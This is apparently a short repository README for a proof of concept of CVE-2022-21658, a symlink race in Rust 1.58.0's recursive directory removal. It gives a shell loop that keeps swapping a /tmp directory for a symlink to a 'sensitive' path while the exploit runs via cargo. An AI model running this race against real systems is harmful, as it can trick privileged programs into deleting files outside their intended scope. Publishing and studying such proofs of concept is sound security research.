/cve-2022-21658

POC for cve-2022-21658

Primary LanguageRust

CVE-2022-21658 poc

Make sure the use the Rust 1.58.0 version.

First run:

while :; do mkdir /tmp/legit; rm -r /tmp/legit; ln -s /tmp/sensitive /tmp/legit; done

Then:

cargo run